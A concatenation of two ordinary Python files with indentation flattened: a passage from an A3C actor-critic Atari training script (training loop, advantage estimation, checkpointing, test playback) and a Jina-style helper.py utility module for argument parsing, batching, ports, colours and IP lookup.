log_prob = F.log_softmax(logit) # Do it again, a lot to make sure its correct
entropy = -(log_prob * prob).sum(1, keepdim=True) # To increase diversity of our choice (part of e-greedy?)
entropies.append(entropy)
# detach - anything compute with pytorch will drag a trail behind it. When get gradient descent, the calculation will race with the result. We do not want the descent to chase it randomly, so we just detach it. !Do not need to modify this function when modify the code.
action = prob.multinomial().detach() # detach -- so the backprob will NOT go through multinomial()
# use the current action as an index to get the
# corresponding log probability
log_prob = log_prob.gather(1, action) # allow you to simultenously take probability of many actions.
action = action.data[0, 0] # Extract the variables out of the integer. Turning it from a torch integer to a "normal" integer
# Accept what was given by the action, does it things? and the env will return the 4 following; state, reward, done
# _ is something that we don't care about but since env.step is returning 4 values so we just have to have something to take it.
state, reward, done, _ = env.step(action)
reward_sum += reward
reward_sum1 += reward # reason why store reward sum twice just for re-assurance
done = (done or t >= max_episode_length)
if done:
t_ = t
t = 0
state = env.reset()
episodes += 1
if episodes % 10 == 0:
time_str = time.strftime(
"%Hh %Mm %Ss", time.gmtime(time.time() - start_time))
print("Time {}, worker-{} episode {} "
"mean episode reward {}, "
"episode length {}".
format(time_str, rank, episodes, reward_sum / 10.0, t_))
reward_sum = 0.0
if episodes % checkpoint_n == 0:
ave_reward = reward_sum1 / checkpoint_n
if best_reward < ave_reward:
isbest = 1
best_reward = ave_reward
print("Saving checkpoint Time {}, worker-{} episode {} "
"mean episode reward {}, "
"episode length {} best_reward {}".
format(get_elapsed_time_str(), rank, episodes, ave_reward, t_, best_reward))
checkpoint_fname = os.path.join(
args.savedir,
args.rom + '_worker' + str(rank) + '_' + str(episodes))
save_checkpoint({'epoch': episodes,
'average_reward': ave_reward,
'time': time.time(),
'state_dict': model.state_dict(),
'optimizer': optimizer.state_dict(),
}, isbest, checkpoint_fname)
reward_sum1 = 0.0
state = Variable(torch.from_numpy(state).unsqueeze(0).type(FloatTensor), requires_grad=False)
reward = max(min(reward, 1), -1)
values.append(v)
log_probs.append(log_prob) # Keep record
rewards.append(reward)
if done:
break
# We reach here because either
# i) an episode ends, such as game over
# ii) we have explored certain steps into the future and now it is
# time to look-back and summerise the
if done:
R = torch.zeros(1, 1).type(FloatTensor) # If game over, the game over stage receive a reward of 0
else:
value, _, _ = model((state, (hx, cx))) # if its not game over, then we will use the model to evaluate the reward
R = value.data
values.append(Variable(R))
critic_loss = 0
actor_loss = 0
R = Variable(R)
gae = 0
for i in reversed(range(len(rewards))):
R = gamma * R + rewards[i] # R - longterm reward
advantage = R - values[i] # type: Variable, advantage against the average
# Compare the actual long-term reward. Note: we are reversing the
# experience of a complete trajectory. If the full length is 100
# (time indexes are among 0, 1, 2, ..., 99), and now i=50, that means
# we have processed all information in steps, 51, 52, ..., 99
# and R will contain the actual long term reward at time step 51 at
# the beginning of this step. The above computation injects the reward
# information in step 50 to R. Now R is the long-term reward at this
# step.
#
# So-called advantage is then the "unexpected gain/loss". It forms the base
# of evaluating the action taken at this step (50).
#
# critic_loss accumulates those "exceptional gain/loss" so that later we will
# adjust our expectation for each state and reduce future exceptions (to better
# evaluate actions, say, the advantage agains expectation is only meaningful
# when the expectation itself is meaningful).
critic_loss += 0.5 * advantage.pow(2)
# Generalized Advantage Estimation
# see https://arxiv.org/abs/1506.02438
# we can use advantage in the computation of the direction to adjust policy,
# but the manipulation here improves stability (as claims by the paper).
#
# Note advantage implicitly contributes to GAE, since it helps
# achieve a good estimation of state-values.
td_error = rewards[i] + gamma * values[i + 1].data - values[i].data
gae = gae * gamma * tau + td_error
# log_probs[i] is the log-probability(action-taken). If GAE is great, that
# means the choice we had made was great, and we want to make the same
# action decision in future -- make log_probs[i] large. Otherwise,
# we add log_probs to our regret and will be less likely to take the same
# action in future.
#
# entropy means the variety in a probabilistic distribution,
# to encourage big entropies is to make more exploration.
actor_loss -= (Variable(gae) * log_probs[i] + 0.01 * entropies[i])
optimizer.zero_grad() # Applied the gradient to the parameter (back-propagation will get you good stuff from gradient)
total_loss = actor_loss + critic_loss * 0.5 # type: Variable
total_loss.backward() # error occur, back propagation
# this is to improve stability
torch.nn.utils.clip_grad_norm(model.parameters(), max_grad_norm)
ensure_shared_grads(model, shared_model) # Push each updated model to the shared model
optimizer.step()
def save_checkpoint(state, is_best, filename):
torch.save(state, filename)
if is_best:
dirname, _ = os.path.split(filename)
best_fname = os.path.join(dirname, 'best.tar')
shutil.copyfile(filename, best_fname)
# noinspection PyShadowingNames
def test(shared_model, render=0):
env = create_atari_env(args.rom)
if render == 1:
env.render()
model = ActorCritic(env.observation_space.shape[0], env.action_space)
model.eval()
state = env.reset()
state = torch.from_numpy(state)
reward_sum = 0
done = True
# a quick hack to prevent the agent from stucking
episode_length = 0
cx = hx = None
while True:
episode_length += 1
# Sync with the shared model
if done:
model.load_state_dict(shared_model.state_dict())
cx = Variable(torch.zeros(1, 256).type(FloatTensor), volatile=True)
hx = Variable(torch.zeros(1, 256).type(FloatTensor), volatile=True)
else:
cx = Variable(cx.data, volatile=True)
hx = Variable(hx.data, volatile=True)
value, logit, (hx, cx) = model((Variable(
state.unsqueeze(0).type(FloatTensor), volatile=True), (hx, cx)))
prob = F.softmax(logit)
# print logit.data.numpy()
action = prob.max(1, keepdim=True)[1].data.cpu().numpy()
state, reward, done, _ = env.step(action[0, 0])
if render:
#env.render()
# Spits out images in the selected path
img = env.render('rgb_array')
imsave('/opt/tmp/img/pac-20000/frame_{:06d}.png'.format(episode_length), img)
"""
TEST-DEMO-ONLY
state_im = state.numpy()
state_im.transpose()
scipy.misc.imageio.saveim(state_im, filename-with-time-step-number)
#ffmpeg
END-WORKZONE
"""
done = done or episode_length >= 10000
reward_sum += reward
# a quick hack to prevent the agent from stucking
# actions.append(action[0, 0])
# if actions.count(actions[0]) == actions.maxlen:
# done = True
if done:
print("Time {}, episode reward {}, episode length {}".
format(get_elapsed_time_str(), reward_sum, episode_length))
reward_sum = 0
episode_length = 0
state = env.reset()
time.sleep(60)
state = torch.from_numpy(state)
if __name__ == '__main__':
env = create_atari_env(args.rom)
# torch.manual_seed(SEED)
shared_model = ActorCritic(env.observation_space.shape[0], env.action_space)
shared_model.share_memory()
# print (shared_model.conv1._parameters['weight'].data.is_cuda)
optimizer = SharedAdam(shared_model.parameters(), lr=0.0001)
optimizer.share_memory()
if args.play:
if os.path.isfile(args.play):
print("=> loading checkpoint '{}'".format(args.play))
checkpoint = torch.load(args.play)
# args.start_epoch = checkpoint['epoch']
# best_prec1 = checkpoint['best_prec1']
shared_model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.play))
test(shared_model, render=1) # let it play the game
exit(0)
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
# args.start_epoch = checkpoint['epoch']
# best_prec1 = checkpoint['best_prec1']
shared_model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
mp.set_start_method('spawn')
processes = []
p = mp.Process(target=test, args=(shared_model, 0))
p.start()
processes.append(p)
# This loop start the processes
for rank in range(0, 1): # This loop how many agent we shall run simultaneously
print("Starting {}".format(rank))
p = mp.Process(target=train, args=(rank, shared_model, optimizer))
p.start() # Start point
processes.append(p)
for p in processes:
p.join()
|
helper.py
|
import asyncio
import functools
import inspect
import json
import math
import os
import random
import re
import sys
import threading
import time
import uuid
import warnings
from argparse import ArgumentParser, Namespace
from collections.abc import MutableMapping
from datetime import datetime
from itertools import islice
from types import SimpleNamespace
from typing import (
Callable,
Tuple,
Optional,
Iterator,
Any,
Union,
List,
Dict,
Set,
Sequence,
Iterable,
TypeVar,
TYPE_CHECKING,
)
from jina import __windows__
__all__ = [
'batch_iterator',
'parse_arg',
'random_port',
'random_identity',
'random_uuid',
'expand_env_var',
'colored',
'ArgNamespace',
'is_valid_local_config_source',
'cached_property',
'typename',
'get_public_ip',
'get_internal_ip',
'convert_tuple_to_list',
'run_async',
'deprecated_alias',
'countdown',
'CatchAllCleanupContextManager',
'download_mermaid_url',
'get_readable_size',
'get_or_reuse_loop',
'T',
]
if TYPE_CHECKING:
from docarray import DocumentArray
T = TypeVar('T')
def deprecated_alias(**aliases):
"""
Usage, kwargs with key as the deprecated arg name and value be a tuple, (new_name, deprecate_level).
With level 0 means warning, level 1 means exception.
For example:
.. highlight:: python
.. code-block:: python
@deprecated_alias(input_fn=('inputs', 0), buffer=('input_fn', 0), callback=('on_done', 1), output_fn=('on_done', 1))
:param aliases: maps aliases to new arguments
:return: wrapper
"""
from jina.excepts import NotSupportedError
def _rename_kwargs(func_name: str, kwargs, aliases):
"""
Raise warnings or exceptions for deprecated arguments.
:param func_name: Name of the function.
:param kwargs: key word arguments from the function which is decorated.
:param aliases: kwargs with key as the deprecated arg name and value be a tuple, (new_name, deprecate_level).
"""
for alias, new_arg in aliases.items():
if not isinstance(new_arg, tuple):
raise ValueError(
f'{new_arg} must be a tuple, with first element as the new name, '
f'second element as the deprecated level: 0 as warning, 1 as exception'
)
if alias in kwargs:
new_name, dep_level = new_arg
if new_name in kwargs:
raise NotSupportedError(
f'{func_name} received both {alias} and {new_name}'
)
if dep_level == 0:
warnings.warn(
f'`{alias}` is renamed to `{new_name}` in `{func_name}()`, the usage of `{alias}` is '
f'deprecated and will be removed in the next version.',
DeprecationWarning,
)
kwargs[new_name] = kwargs.pop(alias)
elif dep_level == 1:
raise NotSupportedError(f'{alias} has been renamed to `{new_name}`')
def deco(f):
"""
Set Decorator function.
:param f: function the decorator is used for
:return: wrapper
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
"""
Set wrapper function.
:param args: wrapper arguments
:param kwargs: wrapper key word arguments
:return: result of renamed function.
"""
_rename_kwargs(f.__name__, kwargs, aliases)
return f(*args, **kwargs)
return wrapper
return deco
def deprecated_method(new_function_name):
def deco(func):
def wrapper(*args, **kwargs):
warnings.warn(
f'`{func.__name__}` is renamed to `{new_function_name}`, the usage of `{func.__name__}` is '
f'deprecated and will be removed.',
DeprecationWarning,
)
return func(*args, **kwargs)
return wrapper
return deco
def get_readable_size(num_bytes: Union[int, float]) -> str:
"""
Transform the bytes into readable value with different units (e.g. 1 KB, 20 MB, 30.1 GB).
:param num_bytes: Number of bytes.
:return: Human readable string representation.
"""
num_bytes = int(num_bytes)
if num_bytes < 1024:
return f'{num_bytes} Bytes'
elif num_bytes < 1024 ** 2:
return f'{num_bytes / 1024:.1f} KB'
elif num_bytes < 1024 ** 3:
return f'{num_bytes / (1024 ** 2):.1f} MB'
else:
return f'{num_bytes / (1024 ** 3):.1f} GB'
def batch_iterator(
data: Iterable[Any],
batch_size: int,
axis: int = 0,
) -> Iterator[Any]:
"""
Get an iterator of batches of data.
For example:
.. highlight:: python
.. code-block:: python
for req in batch_iterator(data, batch_size, split_over_axis):
# Do something with batch
:param data: Data source.
:param batch_size: Size of one batch.
:param axis: Determine which axis to iterate for np.ndarray data.
:yield: data
:return: An Iterator of batch data.
"""
import numpy as np
if not batch_size or batch_size <= 0:
yield data
return
if isinstance(data, np.ndarray):
_l = data.shape[axis]
_d = data.ndim
sl = [slice(None)] * _d
if batch_size >= _l:
yield data
return
for start in range(0, _l, batch_size):
end = min(_l, start + batch_size)
sl[axis] = slice(start, end)
yield data[tuple(sl)]
elif isinstance(data, Sequence):
if batch_size >= len(data):
yield data
return
for _ in range(0, len(data), batch_size):
yield data[_ : _ + batch_size]
elif isinstance(data, Iterable):
# as iterator, there is no way to know the length of it
iterator = iter(data)
while True:
chunk = tuple(islice(iterator, batch_size))
if not chunk:
return
yield chunk
else:
raise TypeError(f'unsupported type: {type(data)}')
def parse_arg(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Parse the arguments from string to `Union[bool, int, str, list, float]`.
:param v: The string of arguments
:return: The parsed arguments list.
"""
m = re.match(r'^[\'"](.*)[\'"]$', v)
if m:
return m.group(1)
if v.startswith('[') and v.endswith(']'):
# function args must be immutable tuples not list
tmp = v.replace('[', '').replace(']', '').strip().split(',')
if len(tmp) > 0:
return [parse_arg(vv.strip()) for vv in tmp]
else:
return []
try:
v = int(v) # parse int parameter
except ValueError:
try:
v = float(v) # parse float parameter
except ValueError:
if len(v) == 0:
# ignore it when the parameter is empty
v = None
elif v.lower() == 'true': # parse boolean parameter
v = True
elif v.lower() == 'false':
v = False
return v
def countdown(t: int, reason: str = 'I am blocking this thread') -> None:
"""
Display the countdown in console.
For example:
.. highlight:: python
.. code-block:: python
countdown(10, reason=colored('re-fetch access token', 'cyan', attrs=['bold', 'reverse']))
:param t: Countdown time.
:param reason: A string message of reason for this Countdown.
"""
try:
sys.stdout.write('\n')
sys.stdout.flush()
while t > 0:
t -= 1
msg = f'⏳ {colored("%3d" % t, "yellow")}s left: {reason}'
sys.stdout.write(f'\r{msg}')
sys.stdout.flush()
time.sleep(1)
sys.stdout.write('\n')
sys.stdout.flush()
except KeyboardInterrupt:
sys.stdout.write('no more patience? good bye!')
_random_names = (
(
'first',
'great',
'local',
'small',
'right',
'large',
'young',
'early',
'major',
'clear',
'black',
'whole',
'third',
'white',
'short',
'human',
'royal',
'wrong',
'legal',
'final',
'close',
'total',
'prime',
'happy',
'sorry',
'basic',
'aware',
'ready',
'green',
'heavy',
'extra',
'civil',
'chief',
'usual',
'front',
'fresh',
'joint',
'alone',
'rural',
'light',
'equal',
'quiet',
'quick',
'daily',
'urban',
'upper',
'moral',
'vital',
'empty',
'brief',
),
(
'world',
'house',
'place',
'group',
'party',
'money',
'point',
'state',
'night',
'water',
'thing',
'order',
'power',
'court',
'level',
'child',
'south',
'staff',
'woman',
'north',
'sense',
'death',
'range',
'table',
'trade',
'study',
'other',
'price',
'class',
'union',
'value',
'paper',
'right',
'voice',
'stage',
'light',
'march',
'board',
'month',
'music',
'field',
'award',
'issue',
'basis',
'front',
'heart',
'force',
'model',
'space',
'peter',
),
)
def random_name() -> str:
"""
Generate a random name from list.
:return: A Random name.
"""
return '_'.join(random.choice(_random_names[j]) for j in range(2))
assigned_ports = set()
def random_port() -> Optional[int]:
"""
Get a random available port number from '49153' to '65535'.
:return: A random port.
"""
import threading
import multiprocessing
from contextlib import closing
import socket
def _get_port(port=0):
with multiprocessing.Lock():
with threading.Lock():
if port not in assigned_ports:
with closing(
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
) as s:
try:
s.bind(('', port))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
except OSError:
pass
else:
return None
_port = None
if 'JINA_RANDOM_PORT_MIN' in os.environ or 'JINA_RANDOM_PORT_MAX' in os.environ:
min_port = int(os.environ.get('JINA_RANDOM_PORT_MIN', '49153'))
max_port = int(os.environ.get('JINA_RANDOM_PORT_MAX', '65535'))
all_ports = list(range(min_port, max_port + 1))
random.shuffle(all_ports)
for _port in all_ports:
if _get_port(_port) is not None:
break
else:
raise OSError(
f'can not find an available port between [{min_port}, {max_port}].'
)
else:
_port = _get_port()
assigned_ports.add(int(_port))
return int(_port)
def random_identity(use_uuid1: bool = False) -> str:
"""
Generate random UUID.
..note::
A MAC address or time-based ordering (UUID1) can afford increased database performance, since it's less work
to sort numbers closer-together than those distributed randomly (UUID4) (see here).
A second related issue, is that using UUID1 can be useful in debugging, even if origin data is lost or not
explicitly stored.
:param use_uuid1: use UUID1 instead of UUID4. This is the default Document ID generator.
:return: A random UUID.
"""
return random_uuid(use_uuid1).hex
def random_uuid(use_uuid1: bool = False) -> uuid.UUID:
"""
Get a random UUID.
:param use_uuid1: Use UUID1 if True, else use UUID4.
:return: A random UUID.
"""
return uuid.uuid1() if use_uuid1 else uuid.uuid4()
def expand_env_var(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Expand the environment variables.
:param v: String of environment variables.
:return: Parsed environment variables.
"""
if isinstance(v, str):
return parse_arg(os.path.expandvars(v))
else:
return v
def expand_dict(
d: Dict, expand_fn=expand_env_var, resolve_cycle_ref=True
) -> Dict[str, Any]:
"""
Expand variables from YAML file.
:param d: Target Dict.
:param expand_fn: Parsed environment variables.
:param resolve_cycle_ref: Defines if cyclic references should be resolved.
:return: Expanded variables.
"""
expand_map = SimpleNamespace()
pat = re.compile(r'{.+}|\$[a-zA-Z0-9_]*\b')
def _scan(sub_d: Union[Dict, List], p):
if isinstance(sub_d, dict):
for k, v in sub_d.items():
if isinstance(v, dict):
p.__dict__[k] = SimpleNamespace()
_scan(v, p.__dict__[k])
elif isinstance(v, list):
p.__dict__[k] = list()
_scan(v, p.__dict__[k])
else:
p.__dict__[k] = v
elif isinstance(sub_d, list):
for idx, v in enumerate(sub_d):
if isinstance(v, dict):
p.append(SimpleNamespace())
_scan(v, p[idx])
elif isinstance(v, list):
p.append(list())
_scan(v, p[idx])
else:
p.append(v)
def _replace(sub_d: Union[Dict, List], p):
if isinstance(sub_d, Dict):
for k, v in sub_d.items():
if isinstance(v, (dict, list)):
_replace(v, p.__dict__[k])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[k] = _sub(v, p)
elif isinstance(sub_d, List):
for idx, v in enumerate(sub_d):
if isinstance(v, (dict, list)):
_replace(v, p[idx])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[idx] = _sub(v, p)
def _sub(v, p):
if resolve_cycle_ref:
try:
v = v.format(root=expand_map, this=p)
except KeyError:
pass
return expand_fn(v)
_scan(d, expand_map)
_replace(d, expand_map)
return d
_ATTRIBUTES = {
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8,
}
_HIGHLIGHTS = {
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47,
}
_COLORS = {
'black': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37,
}
_RESET = '\033[0m'
if __windows__:
os.system('color')
def colored(
text: str,
color: Optional[str] = None,
on_color: Optional[str] = None,
attrs: Optional[Union[str, list]] = None,
) -> str:
"""
Give the text with color.
:param text: The target text.
:param color: The color of text. Chosen from the following.
{
'grey': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37
}
:param on_color: The on_color of text. Chosen from the following.
{
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47
}
:param attrs: Attributes of color. Chosen from the following.
{
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8
}
:return: Colored text.
"""
if 'JINA_LOG_NO_COLOR' not in os.environ:
fmt_str = '\033[%dm%s'
if color:
text = fmt_str % (_COLORS[color], text)
if on_color:
text = fmt_str % (_HIGHLIGHTS[on_color], text)
if attrs:
if isinstance(attrs, str):
attrs = [attrs]
if isinstance(attrs, list):
for attr in attrs:
text = fmt_str % (_ATTRIBUTES[attr], text)
text += _RESET
return text
class ColorContext:
def __init__(self, color: str, bold: Optional[bool] = False):
self._color = color
self._bold = bold
def __enter__(self):
if self._bold:
fmt_str = '\033[1;%dm'
else:
fmt_str = '\033[0;%dm'
c = fmt_str % (_COLORS[self._color])
print(c, flush=True, end='')
return self
def __exit__(self, typ, value, traceback):
print(_RESET, flush=True, end='')
def warn_unknown_args(unknown_args: List[str]):
"""Creates warnings for all given arguments.
:param unknown_args: arguments that are possibly unknown to Jina
"""
from cli.lookup import _build_lookup_table
all_args = _build_lookup_table()[0]
has_migration_tip = False
real_unknown_args = []
warn_strs = []
for arg in unknown_args:
if arg.replace('--', '') not in all_args:
from jina.parsers.deprecated import get_deprecated_replacement
new_arg = get_deprecated_replacement(arg)
if new_arg:
if not has_migration_tip:
warn_strs.append('Migration tips:')
has_migration_tip = True
warn_strs.append(f'\t`{arg}` has been renamed to `{new_arg}`')
real_unknown_args.append(arg)
if real_unknown_args:
warn_strs = [f'ignored unknown argument: {real_unknown_args}.'] + warn_strs
warnings.warn(''.join(warn_strs))
class ArgNamespace:
"""Helper function for argparse.Namespace object."""
@staticmethod
def kwargs2list(kwargs: Dict) -> List[str]:
"""
Convert dict to an argparse-friendly list.
:param kwargs: dictionary of key-values to be converted
:return: argument list
"""
args = []
from jina.executors import BaseExecutor
for k, v in kwargs.items():
k = k.replace('_', '-')
if v is not None:
if isinstance(v, bool):
if v:
args.append(f'--{k}')
elif isinstance(v, list): # for nargs
args.extend([f'--{k}', *(str(vv) for vv in v)])
elif isinstance(v, dict):
args.extend([f'--{k}', json.dumps(v)])
elif isinstance(v, type) and issubclass(v, BaseExecutor):
args.extend([f'--{k}', v.__name__])
else:
args.extend([f'--{k}', str(v)])
return args
@staticmethod
def kwargs2namespace(
kwargs: Dict[str, Union[str, int, bool]],
parser: ArgumentParser,
warn_unknown: bool = False,
fallback_parsers: Optional[List[ArgumentParser]] = None,
positional_args: Optional[Tuple[str, ...]] = None,
) -> Namespace:
"""
Convert dict to a namespace.
:param kwargs: dictionary of key-values to be converted
:param parser: the parser for building kwargs into a namespace
:param warn_unknown: True, if unknown arguments should be logged
:param fallback_parsers: a list of parsers to help resolving the args
:param positional_args: some parser requires positional arguments to be presented
:return: argument list
"""
args = ArgNamespace.kwargs2list(kwargs)
if positional_args:
args += positional_args
p_args, unknown_args = parser.parse_known_args(args)
if warn_unknown and unknown_args:
_leftovers = set(unknown_args)
if fallback_parsers:
for p in fallback_parsers:
_, _unk_args = p.parse_known_args(args)
_leftovers = _leftovers.intersection(_unk_args)
if not _leftovers:
# all args have been resolved
break
warn_unknown_args(_leftovers)
return p_args
@staticmethod
def get_non_defaults_args(
args: Namespace, parser: ArgumentParser, taboo: Optional[Set[str]] = None
) -> Dict:
"""
Get non-default args in a dict.
:param args: the namespace to parse
:param parser: the parser for referring the default values
:param taboo: exclude keys in the final result
:return: non defaults
"""
if taboo is None:
taboo = set()
non_defaults = {}
_defaults = vars(parser.parse_args([]))
for k, v in vars(args).items():
if k in _defaults and k not in taboo and _defaults[k] != v:
non_defaults[k] = v
return non_defaults
@staticmethod
def flatten_to_dict(
args: Union[Dict[str, 'Namespace'], 'Namespace']
) -> Dict[str, Any]:
"""Convert argparse.Namespace to dict to be uploaded via REST.
:param args: namespace or dict or namespace to dict.
:return: pea args
"""
if isinstance(args, Namespace):
return vars(args)
elif isinstance(args, dict):
pea_args = {}
for k, v in args.items():
if isinstance(v, Namespace):
pea_args[k] = vars(v)
elif isinstance(v, list):
pea_args[k] = [vars(_) for _ in v]
else:
pea_args[k] = v
return pea_args
def is_valid_local_config_source(path: str) -> bool:
# TODO: this function must be refactored before 1.0 (Han 12.22)
"""
Check if the path is valid.
:param path: Local file path.
:return: True if the path is valid else False.
"""
try:
from jina.jaml import parse_config_source
parse_config_source(path)
return True
except FileNotFoundError:
return False
def get_full_version() -> Optional[Tuple[Dict, Dict]]:
"""
Get the version of libraries used in Jina and environment variables.
:return: Version information and environment variables
"""
import os, grpc, google.protobuf, yaml, platform
from jina import (
__version__,
__proto_version__,
__docarray_version__,
__jina_env__,
__uptime__,
__unset_msg__,
)
from google.protobuf.internal import api_implementation
from grpc import _grpcio_metadata
from jina.logging.predefined import default_logger
from uuid import getnode
try:
info = {
'jina': __version__,
'docarray': __docarray_version__,
'jina-proto': __proto_version__,
'jina-vcs-tag': os.environ.get('JINA_VCS_VERSION', __unset_msg__),
'protobuf': google.protobuf.__version__,
'proto-backend': api_implementation._default_implementation_type,
'grpcio': getattr(grpc, '__version__', _grpcio_metadata.__version__),
'pyyaml': yaml.__version__,
'python': platform.python_version(),
'platform': platform.system(),
'platform-release': platform.release(),
'platform-version': platform.version(),
'architecture': platform.machine(),
'processor': platform.processor(),
'uid': getnode(),
'session-id': str(random_uuid(use_uuid1=True)),
'uptime': __uptime__,
'ci-vendor': get_ci_vendor() or __unset_msg__,
}
env_info = {k: os.getenv(k, __unset_msg__) for k in __jina_env__}
full_version = info, env_info
except Exception as e:
default_logger.error(str(e))
full_version = None
return full_version
def format_full_version_info(info: Dict, env_info: Dict) -> str:
"""
Format the version information.
:param info: Version information of Jina libraries.
:param env_info: The Jina environment variables.
:return: Formatted version information.
"""
version_info = '\n'.join(f'- {k:30s}{v}' for k, v in info.items())
env_info = '\n'.join(f'* {k:30s}{v}' for k, v in env_info.items())
return version_info + '\n' + env_info
def _update_policy():
if __windows__:
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
elif 'JINA_DISABLE_UVLOOP' in os.environ:
return
else:
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ModuleNotFoundError:
warnings.warn(
'Install `uvloop` via `pip install "jina[uvloop]"` for better performance.'
)
def get_or_reuse_loop():
"""
Get a new eventloop or reuse the current opened eventloop.
:return: A new eventloop or reuse the current opened eventloop.
"""
try:
loop = asyncio.get_running_loop()
if loop.is_closed():
raise RuntimeError
except RuntimeError:
_update_policy()
# no running event loop
# create a new loop
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop
def typename(obj):
"""
Get the typename of object.
:param obj: Target object.
:return: Typename of the obj.
"""
if not isinstance(obj, type):
obj = obj.__class__
try:
return f'{obj.__module__}.{obj.__name__}'
except AttributeError:
return str(obj)
class CatchAllCleanupContextManager:
"""
This context manager guarantees, that the :method:``__exit__`` of the
sub context is called, even when there is an Exception in the
:method:``__enter__``.
:param sub_context: The context, that should be taken care of.
"""
def __init__(self, sub_context):
self.sub_context = sub_context
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type:
self.sub_context.__exit__(exc_type, exc_val, exc_tb)
class cached_property:
"""The decorator to cache property of a class."""
def __init__(self, func):
"""
Create the :class:`cached_property`.
:param func: Cached function.
"""
self.func = func
def __get__(self, obj, cls):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
return cached_value
value = obj.__dict__[f'CACHED_{self.func.__name__}'] = self.func(obj)
return value
def __delete__(self, obj):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
if hasattr(cached_value, 'close'):
cached_value.close()
del obj.__dict__[f'CACHED_{self.func.__name__}']
class _cache_invalidate:
"""Class for cache invalidation, remove strategy.
:param func: func to wrap as a decorator.
:param attribute: String as the function name to invalidate cached
data. E.g. in :class:`cached_property` we cache data inside the class obj
with the `key`: `CACHED_{func.__name__}`, the func name in `cached_property`
is the name to invalidate.
"""
def __init__(self, func, attribute: str):
self.func = func
self.attribute = attribute
def __call__(self, *args, **kwargs):
obj = args[0]
cached_key = f'CACHED_{self.attribute}'
if cached_key in obj.__dict__:
del obj.__dict__[cached_key] # invalidate
self.func(*args, **kwargs)
def __get__(self, obj, cls):
from functools import partial
return partial(self.__call__, obj)
def cache_invalidate(attribute: str):
"""The cache invalidator decorator to wrap the method call.
Check the implementation in :class:`_cache_invalidate`.
:param attribute: The func name as was stored in the obj to invalidate.
:return: wrapped method.
"""
def _wrap(func):
return _cache_invalidate(func, attribute)
return _wrap
def get_now_timestamp():
"""
Get the datetime.
:return: The datetime in int format.
"""
now = datetime.now()
return int(datetime.timestamp(now))
def get_readable_time(*args, **kwargs):
"""
Get the datetime in human readable format (e.g. 115 days and 17 hours and 46 minutes and 40 seconds).
For example:
.. highlight:: python
.. code-block:: python
get_readable_time(seconds=1000)
:param args: arguments for datetime.timedelta
:param kwargs: key word arguments for datetime.timedelta
:return: Datetime in human readable format.
"""
import datetime
secs = float(datetime.timedelta(*args, **kwargs).total_seconds())
units = [('day', 86400), ('hour', 3600), ('minute', 60), ('second', 1)]
parts = []
for unit, mul in units:
if secs / mul >= 1 or mul == 1:
if mul > 1:
n = int(math.floor(secs / mul))
secs -= n * mul
else:
n = int(secs)
parts.append(f'{n} {unit}' + ('' if n == 1 else 's'))
return ' and '.join(parts)
def get_internal_ip():
"""
Return the private IP address of the gateway for connecting from other machine in the same network.
:return: Private IP address.
"""
import socket
ip = '127.0.0.1'
try:
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
ip = s.getsockname()[0]
except Exception:
pass
return ip
def get_public_ip(timeout: float = 0.3):
"""
Return the public IP address of the gateway for connecting from other machine in the public network.
:param timeout: the seconds to wait until return None.
:return: Public IP address.
.. warn::
Set `timeout` to a large number will block the Flow.
"""
import urllib.request
results = []
def _get_ip(url):
try:
req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})
with urllib.request.urlopen(req, timeout=timeout) as fp:
_ip = fp.read().decode().strip()
results.append(_ip)
except:
pass # intentionally ignored, public ip is not showed
ip_server_list = [
'https://api.ipify.org',
'https://ident.me',
'https://checkip.amazonaws.com/',
]
threads = []
for idx, ip in enumerate(ip_server_list):
t = threading.Thread(target=_get_ip, args=(ip,))
threads.append(t)
t.start()
for t in threads:
t.join(timeout)
for r in results:
if r:
return r
def convert_tuple_to_list(d: Dict):
"""
Convert all the tuple type values from a dict to list.
:param d: Dict type of data.
"""
for k, v in d.items():
if isinstance(v, tuple):
d[k] = list(v)
elif isinstance(v, dict):
convert_tuple_to_list(v)
def is_jupyter() -> bool: # pragma: no cover
"""
Check if we're running in a Jupyter notebook, using magic command `get_ipython` that only available in Jupyter.
:return: True if run in a Jupyter notebook else False.
"""
try:
get_ipython # noqa: F821
except NameError:
return False
shell = get_ipython().__class__.__name__ # noqa: F821
if shell == 'ZMQInteractiveShell':
